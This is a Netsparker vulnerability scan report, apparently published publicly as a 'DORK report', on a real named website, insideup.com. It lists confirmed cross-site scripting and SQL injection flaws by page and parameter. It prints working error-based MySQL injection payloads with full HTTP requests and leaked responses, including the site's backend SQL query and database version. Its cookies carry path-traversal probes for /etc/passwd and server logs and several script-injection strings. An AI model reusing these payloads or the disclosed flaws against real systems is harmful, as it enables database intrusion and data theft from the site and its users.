Netsparker, Web Application Security Scanner

DORK Report, SQL Injection, XSS, insideup.com, CWE-79, CWE-89

Netsparker - Scan Report Summary
TARGET URL: http://www.insideup.com/
SCAN DATE: 4/19/2011 9:15:56 PM
REPORT DATE: 4/20/2011 6:55:18 AM
SCAN DURATION: 00:34:55

Total Requests:
Average Speed (req/sec.):
202 identified
174 confirmed
40 critical
5 informational

GHDB, DORK Tests
PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES
CRITICAL: 20 %
IMPORTANT: 75 %
LOW: 3 %
INFORMATION: 2 %

GHDB, DORK VULNERABILITIES
URL Parameter Method Vulnerability Confirmed
/ Apache Version Disclosure No
/communitysignup.html companyName POST Cross-site Scripting Yes
emailAddress POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
password1 POST Cross-site Scripting Yes
password2 POST Cross-site Scripting Yes
pseudonym POST Cross-site Scripting Yes
receiveSpecialOfferEmail POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
termsOfService POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
pseudonym POST Cross-site Scripting Yes
emailAddress POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
pseudonym POST Cross-site Scripting Yes
emailAddress POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
companyName POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
password1 POST Cross-site Scripting Yes
/contactUs.html comments POST Cross-site Scripting Yes
company POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
leadCategory POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
url POST Cross-site Scripting Yes
value POST Cross-site Scripting Yes
yourInterest POST Cross-site Scripting Yes
/css/ Directory Listing (Apache) No
/googleMap.html address GET Cross-site Scripting Yes
/index.html Cookie Not Marked As HttpOnly Yes
/js/ Forbidden Resource Yes
/openx/www/ PHP Version Disclosure No
/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/bulo00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C8)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/bulo00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CF)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/cace00/project.php iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
/ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0009C4)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013D1)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013A8)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001460)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013CA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/dima00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005F5)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/dima00/project.php catId GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/fist00/project.php iusrc GET [Probable] SQL Injection No
/ppc/leadflow/hins00/project.php iusrc GET [Probable] SQL Injection No
/ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001474)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/incn00/project.php catId GET [Probable] SQL Injection No
/ppc/leadflow/inco00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005BB)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/inco00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C2)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lgds00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lgds00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005A7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lodi00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lodi00/project.php catId GET SQL Injection Yes
catId GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005EE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/meac00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005AB)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/meac00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005B7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/obtm00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005D3)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/obtm00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DB)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/parl00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DF)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/parl00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/phsy00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055F)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/phsy00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058B)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001435)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013BD)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B5)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/wede00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/wede00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
catId GET Database Error Message No
MySQL Database Identified Yes
/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/weho00/project.php iusrc GET [Probable] SQL Injection No
/ppc/tools/ Redirect Response BODY Is Too Large Yes
/privacy.html E-mail Address Disclosure No
/selectvendors.html Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/updateCity.html city GET Cross-site Scripting Yes
/whitePapaper.html company POST Cross-site Scripting Yes
companyServices POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
iusrc POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
parentPage POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
src POST Cross-site Scripting Yes
url POST Cross-site Scripting Yes
company POST Cross-site Scripting Yes
companyServices POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
parentPage POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
src POST Cross-site Scripting Yes
url POST Cross-site Scripting Yes
Internal Server Error Yes
SQL Injection

17 TOTAL
CRITICAL
17 CONFIRMED
SQL Injection occurs when input data, for example data supplied by a user, is interpreted by the backend database as part of a SQL command rather than as plain data. This is an extremely common vulnerability, and its successful exploitation can have critical consequences. Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attacks:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the Remedy section for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This lets you handle the issue in one central place. You can also use an ORM (object-relational mapping); most ORM systems use only parameterised queries, which can eliminate the SQL Injection problem entirely.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (if you decide to use a DAL/ORM, change all legacy code to use these new libraries).
  4. Use your web server and application logs to check whether this resource was the target of any previous, undetected attacks.

Remedy

A robust method for mitigating SQL Injection vulnerabilities is to use parameterised queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not build SQL queries dynamically or by string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools for exploiting SQL Injection vulnerabilities. This is a complex area with many dependencies; however, the numerous resources available on the subject have raised both attackers' awareness of these issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3jpuhm6d0i03rre8doid216i86; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
